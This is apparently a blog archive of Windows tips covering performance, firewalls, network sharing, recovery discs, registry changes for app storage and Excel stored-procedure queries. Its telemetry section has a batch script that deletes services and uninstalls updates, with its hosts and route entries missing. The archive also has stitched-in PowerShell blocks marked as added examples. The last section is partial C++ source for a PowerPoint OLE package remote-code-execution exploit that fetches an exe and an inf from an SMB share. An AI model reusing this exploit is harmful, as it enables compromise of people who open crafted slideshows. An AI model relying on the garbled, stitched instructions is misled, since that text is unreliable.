Category Archives: Windows tricks

Speed Up a Slow Windows PC

Windows PCs don’t have to slow down over time. Whether your PC has gradually become slower or it suddenly ground to a halt a few minutes ago, there could be quite a few reasons for that slowness.

As with all PC issues, don’t be afraid to give your computer a reboot if something’s not working properly. This can fix quite a few problems and is faster than attempting to manually troubleshoot and fix the problem yourself.

Find Resource-Hungry Programs

Your PC is running slow because something is using up those resources. If it’s suddenly running slower, a runaway process might be using 99% of your CPU resources, for example. Or, an application might be experiencing a memory leak and using a large amount of memory, causing your PC to swap to disk. Alternately, an application might be using the disk a lot, causing other applications to slow down when they need to load data from or save it to the disk.

To find out, open the Task Manager. You can right-click your taskbar and select the “Task Manager” option or press Ctrl+Shift+Escape to open it. On Windows 8, 8.1, and 10, the new Task Manager provides an upgraded interface that color-codes applications using a lot of resources. Click the “CPU,” “Memory,” and “Disk” headers to sort the list by the applications using the most resources. If any application is using too many resources, you might want to close it normally. If you can’t, select it here and click “End Task” to force it to close.

Close System Tray Programs

Many applications tend to run in the system tray, or notification area. These applications often launch at startup and stay running in the background but remain hidden behind the up arrow icon at the bottom-right corner of your screen. Click the up arrow icon near the system tray, right-click any applications you don’t need running in the background, and close them to free up resources.

Disable Startup Programs

Better yet, prevent those applications from launching at startup to save memory and CPU cycles, as well as speed up the login process.

On Windows 8, 8.1, and 10, there’s now a startup manager in the Task Manager you can use to manage your startup programs. Right-click the taskbar and select “Task Manager” or press Ctrl+Shift+Escape to launch it. Click over to the Startup tab and disable startup applications you don’t need. Windows will helpfully tell you which applications slow down your startup process the most.

Reduce Animations

Windows uses quite a few animations, and those animations can make your PC seem a bit slower. For example, Windows can minimize and maximize windows instantly if you disable the associated animations.

To disable animations, press Windows Key + X or right-click the Start button and select “System.” Click “Advanced System Settings” on the left and click the “Settings” button under Performance. Choose “Adjust for best performance” under Visual Effects to disable all the animations, or select “Custom” and disable the individual animations you don’t want to see. For example, uncheck “Animate windows when minimizing and maximizing” to disable the minimize and maximize animations.

Lighten Your Web Browser

There’s a good chance you use your web browser a lot, so your web browser may just be a bit slow. It’s a good idea to use as few browser extensions, or add-ons, as possible — those slow down your web browser and cause it to use more memory.

Go into your web browser’s Extensions or Add-ons manager and remove add-ons you don’t need. You should also consider enabling click-to-play plug-ins. Preventing Flash and other content from loading will prevent unimportant Flash content from using CPU time.

Scan for Malware and Adware

There’s also a chance your computer is slow because malicious software is slowing it down and running in the background. This may not be flat-out malware — it may be software that interferes with your web browsing to track it and add additional advertisements, for example.

To be extra safe, scan your computer with an antivirus program. You should also scan it with Malwarebytes, which catches a lot of “potentially unwanted programs” (PUPs) that most antivirus programs tend to ignore. These programs try to sneak onto your computer when you install other software, and you almost certainly don’t want them.

Free Up Disk Space

If your hard drive is almost completely full, your computer may run noticeably slower. You want to leave your computer some room to work on your hard drive. Follow our guide to freeing up space on your Windows PC to free up room. You don’t need any third-party software — just running the Disk Cleanup tool included in Windows can help quite a bit.

Defragment Your Hard Disk

Defragmenting your hard disk actually shouldn’t be necessary on modern versions of Windows. It’ll automatically defragment mechanical hard drives in the background. Solid-state drives don’t really need traditional defragmentation, although modern versions of Windows will “optimize” them — and that’s fine.

You shouldn’t worry about defragmentation most of the time. However, if you do have a mechanical hard drive and you’ve just put a lot of files on the drive — for example, copying a huge database or gigabytes of PC game files — those files might be fragmented because Windows hasn’t gotten around to defragmenting them yet. In this situation, you might want to open the disk defragmenter tool and perform a scan to see if you need to run a manual defrag program.

Uninstall Programs You Don’t Use

Open the Control Panel, find the list of installed programs, and uninstall programs you don’t use and don’t need from your PC. This can help speed your PC up, as those programs might include background processes, autostart entries, system services, context menu entries, and other things that can slow down your PC. It’ll also save room on your hard drive and improve system security — for example, you definitely shouldn’t have Java installed if you’re not using it.

Reset Your PC / Reinstall Windows

If the other tips here didn’t fix your problem, the one timeless solution to fix Windows problems — aside from rebooting your PC, of course — is getting a fresh Windows installation.

On modern versions of Windows — that is, Windows 8, 8.1, and 10 — it’s easier to get a fresh Windows installation than ever. You don’t have to get Windows installation media and reinstall Windows. Instead, you can simply use the “Reset your PC” feature built into Windows to get a new, fresh Windows system. This is similar to reinstalling Windows and will wipe your installed programs and system settings while keeping your files.

If your PC is still using a mechanical hard drive, upgrading to a solid-state drive — or just ensuring your next PC has an SSD — will offer you a dramatic performance improvement, too. In an age where most people won’t notice faster CPUs and graphics processors, solid-state storage will offer the single biggest boost in overall system performance for most people.

Stop all of the telemetry servers – Microsoft Windows 10

Add the following lines below to your [C:\Windows\System32\drivers\etc\hosts] file in Windows 10. Make sure you open it from an elevated command prompt so you can save the changes! This will prevent all of the telemetry servers below from resolving so Microsoft Windows 10 will be unable to report your system data back to Microsoft. Take your privacy back!

Thank you,
Jerry (aka. Barnacules)
= Lines you need to add to your HOSTS file =
============================================       local

Certain Windows updates in Windows 10 deliver extra “options” for telemetry on your machine.

For a guide on how to disable several telemetry options already, visit this website:
Another resource is available at:
Certain Windows updates in Windows 10 deliver extra “options” for telemetry on your machine. It is advisable to uninstall them:
For additional privacy, you can add these entries to your hosts file, which is located in:
You can edit and save the file by opening Notepad as Administrator (Press Windows key (“flag” icon), in the search bar enter “notepad”, right-click on notepad and choose Run as Administrator – then browse to the hosts file location).
Note: this does NOT block any Windows Updates.
Copy and paste the following below all the other text in there, save the file. That’s all:
#Microsoft telemetry

Micro$oft Spy removal

Below is the list of “updates” that are delivered by Windows Update as “telemetry and customer experience improvements”. If you don’t want to upgrade to Win10 or send your “telemetry” to MS – remove them and do not install them again.
Microsoft claims this is “telemetry” and customer experience blah-blah-blah. Well I call this simple – spyware.
– “Performance tracker update”
– “Get Windows 10 App” (delivers ready to use UAC backdoor as bonus)
– “Upgrade to Windows 10”
– “Upgrade to Windows 10”
– “Compatibility update for upgrading Windows 7”
– “Customer experience and diagnostic telemetry”
– “Customer experience and diagnostic telemetry”
– “Customer experience and diagnostic telemetry”
– “Telemetry points to consent.exe” !!!WARNING!!! this update adds spyware functionality to UAC
COPY/PASTE the script below the line into your command shell/command line (cmd.exe) to disable the evil spying services spread by Microsoft.



@echo off
echo Step 1: Delete Updates…
echo Delete KB3075249 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3075249
echo Delete KB3080149 (telemetry for Win7/8.1)
start /w wusa.exe /uninstall /kb:3080149
echo Delete KB3021917 (telemetry for Win7)
start /w wusa.exe /uninstall /kb:3021917
echo Delete KB3022345 (telemetry)
start /w wusa.exe /uninstall /kb:3022345
echo Delete KB3068708 (telemetry)
start /w wusa.exe /uninstall /kb:3068708
echo Delete KB3044374 (Get Windows 10 for Win8.1)
start /w wusa.exe /uninstall /kb:3044374
echo Delete KB3035583 (Get Windows 10 for Win7sp1/8.1)
start /w wusa.exe /uninstall /kb:3035583
echo Delete KB2990214 (Get Windows 10 for Win7 without sp1)
start /w wusa.exe /uninstall /kb:2990214
echo Delete KB2990214 (Get Windows 10 for Win7)
start /w wusa.exe /uninstall /kb:2990214
echo Delete KB2952664 (Get Windows 10 assistant)
start /w wusa.exe /uninstall /kb:2952664
echo Delete KB3075853 (update for "Windows Update" on Win8.1/Server 2012R2)
start /w wusa.exe /uninstall /kb:3075853
echo Delete KB3065987 (update for "Windows Update" on Win7/Server 2008R2)
start /w wusa.exe /uninstall /kb:3065987
echo Delete KB3050265 (update for "Windows Update" on Win7)
start /w wusa.exe /uninstall /kb:3050265
echo Delete KB971033  (license validation)
start /w wusa.exe /uninstall /kb:971033
echo Delete KB2902907 (description not available)
start /w wusa.exe /uninstall /kb:2902907
echo Delete KB2976987 (description not available)
start /w wusa.exe /uninstall /kb:2976987
echo Step 2: Blocking Routes…
route -p add MASK
route -p add MASK
route -p add MASK
route -p add MASK
route -p add MASK
route -p add MASK
route -p add MASK
echo Step 3: Disabling tasks…
schtasks /Change /TN "\Microsoft\Windows\Application Experience\AitAgent" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Application Experience\ProgramDataUpdater" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Autochk\Proxy" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Maintenance\WinSAT" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\ActivateWindowsSearch" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\ConfigureInternetTimeService" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\DispatchRecoveryTasks" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\ehDRMInit" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\InstallPlayReady" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\mcupdate" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\MediaCenterRecoveryTask" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\OCURActivate" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\OCURDiscovery" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\PBDADiscovery" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\PBDADiscoveryW1" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\PBDADiscoveryW2" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\PvrRecoveryTask" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\PvrScheduleTask" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\RegisterSearch" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\ReindexSearchRoot" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\SqlLiteRecoveryTask" /DISABLE
schtasks /Change /TN "\Microsoft\Windows\Media Center\UpdateRecordPath" /DISABLE
echo Step 4: Killing Diagtrack-service (if it still exists)…
sc stop Diagtrack
sc delete Diagtrack
echo Final Step: Stop remoteregistry-service (if it still exists)…
sc config remoteregistry start= disabled
sc stop remoteregistry
echo All done, go to reboot!
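
A read-only inventory of the updates, scheduled tasks and services that the script above touches, written as an added example (not part of the original post) so the current state can be recorded before anything is uninstalled, disabled or deleted. It assumes PowerShell 5.1 on Windows 8 or later (for Get-ScheduledTask and the StartType property); the function name New-Row and the CSV file name are hypothetical.

```powershell
# Added example: read-only inventory, nothing is changed.
# KB numbers, task names and service names are copied from the batch script above.
$kbs = 'KB3075249','KB3080149','KB3021917','KB3022345','KB3068708',
       'KB3044374','KB3035583','KB2990214','KB2952664','KB3075853',
       'KB3065987','KB3050265','KB971033','KB2902907','KB2976987'

# Task folder -> task names that the script disables.
$tasks = [ordered]@{
    '\Microsoft\Windows\Application Experience\' =
        @('AitAgent','Microsoft Compatibility Appraiser','ProgramDataUpdater')
    '\Microsoft\Windows\Autochk\' = @('Proxy')
    '\Microsoft\Windows\Customer Experience Improvement Program\' =
        @('Consolidator','KernelCeipTask','UsbCeip')
    '\Microsoft\Windows\DiskDiagnostic\' =
        @('Microsoft-Windows-DiskDiagnosticDataCollector')
    '\Microsoft\Windows\Maintenance\' = @('WinSAT')
    '\Microsoft\Windows\Media Center\' =
        @('ActivateWindowsSearch','ConfigureInternetTimeService','DispatchRecoveryTasks',
          'ehDRMInit','InstallPlayReady','mcupdate','MediaCenterRecoveryTask',
          'ObjectStoreRecoveryTask','OCURActivate','OCURDiscovery','PBDADiscovery',
          'PBDADiscoveryW1','PBDADiscoveryW2','PvrRecoveryTask','PvrScheduleTask',
          'RegisterSearch','ReindexSearchRoot','SqlLiteRecoveryTask','UpdateRecordPath')
}

$services = 'DiagTrack','RemoteRegistry'

# Hypothetical helper: one uniform row per inspected item.
function New-Row($Kind, $Item, $State) {
    [pscustomobject]@{ Kind = $Kind; Item = $Item; State = $State }
}

# Get-HotFix reads Win32_QuickFixEngineering, which lists installed KB updates.
$installed = @(Get-HotFix | ForEach-Object { $_.HotFixID })

$report = @()

# Updates the script would uninstall with wusa.exe.
$report += foreach ($kb in $kbs) {
    $state = if ($installed -contains $kb) { 'Installed' } else { 'Not installed' }
    New-Row 'Update' $kb $state
}

# Scheduled tasks the script would disable with schtasks.
$report += foreach ($folder in $tasks.Keys) {
    foreach ($name in $tasks[$folder]) {
        $task = Get-ScheduledTask -TaskPath $folder -TaskName $name -ErrorAction SilentlyContinue
        $state = if ($task) { [string]$task.State } else { 'Not present' }
        New-Row 'Task' ($folder + $name) $state
    }
}

# Services the script would stop, delete or disable with sc.
$report += foreach ($name in $services) {
    $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
    $state = if ($svc) { "$($svc.Status) / start type $($svc.StartType)" } else { 'Not present' }
    New-Row 'Service' $name $state
}

# Keep a dated baseline next to the on-screen table (file name is an assumption).
$csv = Join-Path $env:TEMP ("telemetry-baseline-{0:yyyyMMdd-HHmmss}.csv" -f (Get-Date))
$report | Export-Csv -Path $csv -NoTypeInformation
$report | Format-Table -AutoSize
Write-Output "Baseline written to $csv"
```

Running it again after the batch script gives a second CSV to compare against the first, which shows exactly which updates, tasks and services were changed.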


Top 7 Firewalls for Windows

There are many tools out there to help you manage your firewall’s operations, but there aren’t too many free ones.

 Comodo Internet Security



Comodo, always a popular choice, has merged its antivirus program with Firewall Pro, creating a free security program for everyone. If you are only interested in the firewall (or antivirus), the installer does let you opt out of either of the components.

PC Tools Firewall Plus Free Edition


PC Tools Firewall Plus is a powerful personal free firewall that protects your computer from hackers and intruders. It can stop Trojans, backdoors, and keyloggers from damaging your computer and stealing your private information.

ZoneAlarm Free Firewall


ZoneAlarm Free Firewall is an excellent tool for replacing the default Windows firewall. It’s always among the top 1 or 2 rated firewall programs and includes better outbound protection, antiphishing guards, and ZoneAlarm’s behavioral detection network.

Ashampoo FireWall Free

Ashampoo FireWall Free is an easy-to-use program that lets users control and prevent unwanted connections to the Internet. It has a tabbed interface that is easy to navigate and comes readily configured.


The program provides automatic notifications when an app attempts to connect to the Internet and gives you the power to block or allow such actions. You can also go in and add rules for programs manually, along with viewing connection stats and logs.

With the Internet Cleaner feature, you can erase evidence of Internet activity as well.

Online Armor Free

Online Armor has all of the normal features of a firewall, but it also comes with a keylogger guard, tamper protection, script and worm protection, and autostart protection. It can defend you from a wide range of attacks, which can be pretty useful.


The program installs incredibly fast, and offers many initial settings and configurations during the start-up wizard so you can be all set right from the beginning.

Agnitum Outpost Firewall Free


Next up on the list is Outpost Firewall. This program offers many advanced features that you would usually only find with commercial software, including proactive protection against malware, control over installed applications’ activity, illegal termination prevention capabilities, policy correction for popular applications, and real-time network statistics.

Filseclab Personal Firewall Professional Edition

Filseclab Personal Firewall Professional Edition is another great free firewall. It can block most attacks from worm viruses and Trojans, as well as some main Adware and Spyware.


It supports real-time monitoring, interactive rules creation, password protection, logging, live updates, and privacy protection. Windows Security Center integration, including balloon message alerts, are also among its unique features.

Microsoft Security Essentials and Windows Defender

Microsoft Security Essentials (MSE) is Microsoft’s free anti-virus software. It is designed to protect against malware and viruses on Windows XP, Vista, and 7, but in Windows 8 it has been discontinued and merged with Windows Defender.

In truth MSE has never been a robust anti-virus, receiving widespread criticism for covering the basics of malware protection and nothing more; we have always recommended that you should replace MSE with a more effective antivirus.


Sadly, Windows Defender does not fare much better than its forerunner. It looks and feels almost exactly like MSE, and like its predecessor offers little more than a barely acceptable minimum level of protection. You should unquestionably download and run a third-party antivirus suite. Avast and AVG are popular, but if you’re not sure there are lots of excellent free antivirus alternatives, along with several sites that offer reliable antivirus reviews. You could even try a cloud-based antivirus program.

Stop Sharing Folders Without a Password

If there’s one thing you should remember about sharing on the network securely, it is this: never turn off password protected sharing. Force all network users who want to access what you are sharing to use the Homegroup or a username and password. This way, if an unwanted guest has access to your network, your shared data is safe from prying eyes.


Also, when sharing something on the network, using the Sharing Wizard or other tools that were covered in the Windows Networking class, avoid sharing with the user ‘Everyone.’ This user means anyone with or without a user account on your computer. Folders shared with this user account are easily accessed by anyone on your network, including unwanted guests who may have received or obtained access.


If you want to have a secure experience as well as an easy way to share folders on your home network, it is best to use the Homegroup feature. With it, you can quickly share just about anything, and your shared resources are accessed only by computers that know the Homegroup password and that have joined the Homegroup. Unwanted guests are left in the dark, unless they crack the Homegroup password and join it as well.
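
One way to check a PC against the advice above, as an added example that is not part of the original article: it lists every non-administrative share whose share permissions allow the “Everyone” group, shows what the folder's NTFS permissions give that group, and reports whether the built-in Guest account is enabled. It assumes Windows 8 or later with PowerShell 5.1 run as Administrator, and it assumes that turning off password protected sharing relies on the Guest account being enabled.

```powershell
# Added example: read-only audit of share permissions, nothing is changed.
# Well-known SIDs are resolved to account names so the check is not tied to
# English-language Windows. S-1-1-0 is the Everyone group.
$sid      = New-Object System.Security.Principal.SecurityIdentifier 'S-1-1-0'
$everyone = $sid.Translate([System.Security.Principal.NTAccount]).Value

$openShares = foreach ($share in (Get-SmbShare -Special $false)) {
    # Share-level ACL entries that allow Everyone.
    $grants = Get-SmbShareAccess -Name $share.Name |
        Where-Object { $_.AccountName -eq $everyone -and $_.AccessControlType -eq 'Allow' }

    foreach ($grant in $grants) {
        # The folder's NTFS ACL applies as well; effective access over the
        # network is the more restrictive of the share and NTFS permissions.
        $ntfsRights = @()
        if ($share.Path -and (Test-Path -LiteralPath $share.Path)) {
            $ntfsRights = @((Get-Acl -LiteralPath $share.Path).Access |
                Where-Object {
                    $_.IdentityReference.Value -eq $everyone -and
                    $_.AccessControlType -eq 'Allow'
                } |
                ForEach-Object { [string]$_.FileSystemRights })
        }

        [pscustomobject]@{
            Share               = $share.Name
            Path                = $share.Path
            ShareRightEveryone  = [string]$grant.AccessRight
            NtfsRightsEveryone  = if ($ntfsRights.Count) { $ntfsRights -join '; ' } else { '(none)' }
        }
    }
}

if ($openShares) {
    Write-Output "Shares that allow ${everyone}:"
    $openShares | Format-Table -AutoSize
} else {
    Write-Output "No user-created share allows $everyone at the share level."
}

# The built-in Guest account always has a SID ending in -501, whatever its name.
# Assumption: password-less sharing depends on this account being enabled.
$guest = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-501' }
if ($guest) {
    Write-Output ("Guest account '{0}' enabled: {1}" -f $guest.Name, $guest.Enabled)
}
```

A share that appears in the table with “(none)” in the NTFS column is still closed to Everyone in practice, but the share permission is worth tightening so that a later NTFS change does not silently open it.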


Multiple Ethernet profiles

1) Set up your network config for the first network option you want
2) Open a command prompt (Start/Run, type CMD, press enter)
3) Type CD \, press enter so that you are pointed to the root of C:\. This is only to make it easier to find the config files we’ll create. You can put them somewhere else if you’re comfortable with the file system.
4) At the command prompt, type netsh interface dump > netcfg1.txt, press enter
5) Change your network settings to your second option
6) At the command prompt again, type netsh interface dump > netcfg2.txt, press enter
7) In Explorer, navigate to C:\, right click and select New/Text File, name it SetNetCfg1.bat, make sure that you remove the .txt extension that it will want to use by default.
8) Right click on the new batch file and select Edit. Enter the following command: netsh -f c:\netcfg1.txt, save the file
9) Right click on the new batch file, drag it and select copy. Rename the copied file to SetNetCfg2.bat
10) Right click on the new batch file and select Edit. Enter the following command: netsh -f c:\netcfg2.txt, save the file

You can either run the batch files directly or create shortcuts to them on your desktop.

EDIT: I just want to qualify something, I’m not sure if this works on Win7 or XP home. It does work on Pro and up.

Process Explorer v16.05



Ever wondered which program has a particular file or directory open? Now you can find out. Process Explorer shows you information about which handles and DLLs processes have opened or loaded.

The Process Explorer display consists of two sub-windows. The top window always shows a list of the currently active processes, including the names of their owning accounts, whereas the information displayed in the bottom window depends on the mode that Process Explorer is in: if it is in handle mode you’ll see the handles that the process selected in the top window has opened; if Process Explorer is in DLL mode you’ll see the DLLs and memory-mapped files that the process has loaded. Process Explorer also has a powerful search capability that will quickly show you which processes have particular handles opened or DLLs loaded.

The unique capabilities of Process Explorer make it useful for tracking down DLL-version problems or handle leaks, and provide insight into the way Windows and applications work.

Best recovery CD

Hiren’s BootCD

Hiren’s BootCD is pretty legendary, and anyone who’s ever worked in support or systems administration has probably used it at least once (or has several versions of it lying around still). The rescue disc is aimed squarely at repairing Windows systems, and includes a wealth of tools to that effect, including antivirus tools to scan your hard drive, anti-malware utilities to clean out spyware and adware, even rootkit detection tools. Hiren’s BootCD can also help you repair, adjust, or re-flash your system’s BIOS or wipe your CMOS, clean out temporary files and folders, securely erase files, back up your data to another hard drive or to the network, update and back up hardware drivers, scan your system for hardware failures, repair lost or damaged partitions, and much much more. We’re only scratching the surface here. It’s completely free and always has been. Even if there are other tools in your toolkit, Hiren’s BootCD should be among them.


The Trinity Rescue Kit

The Trinity Rescue Kit is a customized Linux distribution that’s designed specifically for troubleshooting and reviving ailing systems, whether you’re running Windows or Linux. It fits nicely on a CD (or a USB stick if you prefer) and once booted gives you tools to reset lost Windows passwords, scan hard drives for viruses and malware, clone drives, recover lost partitions, even open up the drives as network shares so you can get files off of them and to other computers on your network. It’s completely free, although a donation to the developer behind it is always appreciated and keeps the project alive.

How to Install Windows Store Apps to an SD Card or Another Drive

Windows 8 installs applications to your C: drive by default, but you may want to change where Windows 8 stores these apps. For example, you could install them to an SD card or secondary hard drive.

This works on both Windows 8 and Windows RT. It’s useful whether you are using a Microsoft Surface, another Windows 8 tablet, or just a computer with a small SSD and a larger secondary drive.

Prepare the New Drive

Before we begin, we must prepare the new install location. First, open a File Explorer window. Right-click the drive where you want to install Windows 8 apps – whether it’s an SD card, hard drive, or whatever else – and select Properties.


Ensure that the drive is formatted as NTFS.


If the drive isn’t formatted as NTFS, you will need to format the drive as NTFS to continue. (Many SD cards are formatted with the FAT file system instead.)

Back up any important data from the drive before continuing – formatting will delete all data on the drive. Right-click the drive and select Format.


Choose the NTFS file system and click Start.


You will want to create a folder for the apps on the drive. You can name it whatever you like, such as WindowsApps or Windows8Apps.


Change the Registry Setting

You will now need to open the registry editor. Press the Windows key, type regedit at the Start screen, and press Enter.

Navigate to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx key.


Select the Appx key, click Edit, and click Permissions. (Ensure the Appx key is selected or you’ll modify permissions for another key instead!)


Click the Advanced button.


Click the Change link next to TrustedInstaller.


Type Administrators into the box, click Check Names, and click OK. This will give all administrators on the computer ownership of the registry key.


Enable the Replace owner on subcontainers and objects checkbox and click OK.


Select Administrators in the Permissions for AppX window and click the Allow option next to Full Control. Click OK and you will now be able to edit the appropriate registry setting.


Double-click the PackageRoot value in the right pane and enter the location of the folder you created earlier. That’s E:\Windows8Apps in the case of our example.


Reboot your computer. Your changes won’t take effect until you reboot.


Move Old Apps to the New Location [Optional]

This will only affect apps you install in the future. Previously installed apps will remain at the old location. To move these apps to the new location, you can uninstall them from your computer and then reinstall them from the Windows Store.

Stored Procedure From Excel Sheet

Reports are a key management requirement for any application, whether it is a web application or a Windows application, and managers usually want to see them in an Excel sheet. So, how about connecting an Excel sheet to a stored procedure, executing it directly from the sheet, and getting the result in the same sheet?

Yes, in this article, I am going to show you how to execute a stored procedure from Excel sheet. Let us consider a scenario where we have two tables in SQL Server database MyOrg, i.e., Department and Employee and say I want to execute a stored procedure GetAllEmpByDid as shown below:

Create procedure [dbo].[GetAllEmpByDid]
(@Did as int)
as
select * from Employee where Did=@Did

Now, below are the steps that we need to perform to execute the stored procedure “GetAllEmpByDid” from Excel sheet.

Step 1

Open an Excel sheet, then go to:

DATA -> From Other Sources -> From Microsoft Query

Step 2

Once you select the From Microsoft Query option, it will open a Choose Data Source popup. Now, from the Databases tab, select <New Data Source> and click OK.

Step 3

As you click OK, it will open another popup, i.e., Create New Data Source. Now give a name of data source, say “MTT” in textbox 1 and select driver as SQL Server from the dropdown list 2. Then click Connect button.

Step 4

Once you click Connect, it will open one more popup, SQL Server Login. Now give the SQL Server name in the Server text box, for example “thinkpad-pc\sqlexpress”. For a valid server name it will enable the Options button. Now click the Options button.

Step 5

Clicking on Options button will dropdown a form Options. Now select the database name from Databases dropdown list, say “MyOrg”. Finally click OK.

Step 6

As soon as you click OK, it will close SQL Server Login. Now Click OK button of Create New Data Source popup, which will close Create New Data Source popup. Finally click OK button of Choose Data Source popup and it will close Choose Data Source popup and will open new popup, i.e., Query Wizard – Choose Columns.

Step 7

Now click the Cancel button of Query Wizard – Choose Columns, which will prompt a Microsoft Query alert; just click the Yes button. This will open another popup, Add Tables. Now click the Close button of Add Tables, and it will leave you on the Microsoft Query popup window.

Step 8

From Microsoft Query Popup Window, click SQL button to open SQL popup window. Write the below query in SQL Statement box and press OK. It will prompt Microsoft Query alert once again and again press OK.

//{CaLL DatabaseName.dbo.StoredProcedureName(one question mark for each parameter)} 
{CALL MyOrg.dbo.GetAllEmpByDid (?)}

Step 9

After pressing OK of Microsoft Query alert, it will prompt a Parameter value window. Just give some default value say “1003”. And press OK and it will execute that stored procedure and give you the result set in Microsoft Query Window.

Step 10

Now close the Microsoft Query window. It will prompt another window, i.e., Import Data. Finally press OK to generate data on Excel sheet.

Step 11

Now we are ready with our Excel sheet executing stored procedure. If you want to execute once again, then go to DESIGN -> and click Refresh. It will prompt a Parameter value window once again, now give some other value say “1004”. And press OK to produce new result.

Step 12

Now save the Excel sheet and close it. Whenever you want to execute the procedure, just open the Excel sheet and refresh (Alt+F5) it from DESIGN tab.


Thank you to

Mohd Manzoor Ahmed


Windows NT 6.X OLE package manager remote code execution through MS Office Powerpoint XYZ slideshow (ppts, pptxs).

    /*++
    Windows NT 6.X OLE package manager remote code execution through
    MS Office Powerpoint XYZ slideshow (ppts, pptxs).


    Undocumented features exist in Windows NT 6 OLE package manager.
    These features allow to bypass ‘Safe download’ mechanism from
    untrusted sources and to execute imm. The IContextMenu i-face
    is used by 3-rd party software (such as MS Office Powerpoint XYZ)
    to unpack and dispatch package data. Shell action to be applied
    to package is specified by action id in ‘cmd’ parameter of slide
    xml-based document. Action Id ‘-1’ and ‘-2’ are reserved by MS
    Office Powerpoint engine. Currently, silent ‘.inf’ installation
    is used for mitigation bypass. The MS Office for Windows XP
    contains internal OLE Package interpreter, so Windows XP doesn’t
    Hi F-5ecure and E5et! We are offering you to patch holes and
    backdoors in your fucking AV-s. We know about them.



    #include <Windows.h>
    #include <OleAuto.h>
    #include <stdio.h>
    #include <OAIdl.h>
    #include <string>
    #include <shldisp.h>
    #include <tlhelp32.h>
    #include <assert.h>

    using namespace std;

    #define MAKE_OFFICE_IMPORT 0

    #import "z:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA6\VBE6EXT.OLB"
    #import "z:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\mso.dll"
    #import "z:\Program Files (x86)\Microsoft Office\Office12\msppt.olb"

    /* Modify office headers after import.
    In file vbe6ext.tlh specify:
    #include "mso.tlh"
    using namespace Office;

    In file msppt.tlh specify:
    #include "vbe6ext.tlh"
    using namespace VBIDE;
    */

    #if _DEBUG

    #include "Debug\mso.tlh"
    #include "Debug\vbe6ext.tlh"
    #include "Debug\msppt.tlh"

    #else

    #include "Release\mso.tlh"
    #include "Release\vbe6ext.tlh"
    #include "Release\msppt.tlh"

    #endif

    /* Processor definitions */
    static HRESULT __G_hresult = S_OK;

    #define CHK_HR( hr ) do { if (FAILED(__G_hresult = (hr))) { goto _Done; } } while(0)

    #define CHK_ALLOC( ptr ) do { if ((ptr) == NULL) {goto _Done; } } while(0)

    #define SAFE_RELEASE_BY_REF( obj ) do { if((*obj) != NULL) { (*obj )->Release(); *obj = NULL;} } while(0)

    #define SAFE_FREE_BSTR_BY_REF( obj ) do { if((*obj) != NULL) { SysFreeString((*obj)); (*obj) = NULL;} } while(0)

    #define VariantInitAsLong( var, val) \
        VariantInit( &(var) ); \
        (var).vt = VT_I4; \
        (var).lVal = val;

    /* Rtns definition */
    int wmain(int argc, wchar_t **argv);
    bool change_file_time(__in wchar_t *fname);
    void print_usage_and_exit(__in wchar_t *exe);
    bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp);
    bool presentation_does_have_ole_packages(__in PowerPoint::_Presentation *pPresentation, __out bool *doesHave);
    bool create_ole_embed_stg_copy(__in const wchar_t *file_result, __in char *str1, __in char *str2);
    bool rewrite_embeddings_in_presentation(__in wchar_t *fnamePpt, __in wchar_t *fnameData);
    bool parse_cmd(int argc, wchar_t **argv, wstring *fnamePptIn, wstring *smbPath, wstring *fnameExe,wstring *fnameExeOnSmb,wstring *fnameInfOnSmb, bool *bForceUpload);

    Rtns implementation
    bool produce_presentation(__in wchar_t *fname, __in wchar_t *fnameSaveAs, __in wchar_t *fname1Tmp, __in wchar_t *fname2Tmp) {

    wstring stdWstrFileSaveAs;
    PowerPoint::PpSaveAsFileType saveAsType;
    bool bres = false,
    bDoesHaveOlePackages = false;
    CLSID appClsid = { 0 };
    BSTR bstrApplicationProgId = NULL,
    bstrPresentationPath = NULL,
    bstrSaveAs = NULL;
    PowerPoint::_Application *pApplication = NULL;
    PowerPoint::Presentations *pPresentations = NULL;
    PowerPoint::_Presentation *pPresentation = NULL;
    PowerPoint::Slides *pSlides = NULL;
    PowerPoint::_Slide *pSlide = NULL;
    PowerPoint::Shapes *pShapes = NULL;
    PowerPoint::Shape *pShape0 = NULL,
    *pShape1 = NULL,
    *pShapeCurr = NULL;
    PowerPoint::TimeLine *pTimeLine = NULL;
    PowerPoint::Sequences *pSequences = NULL;
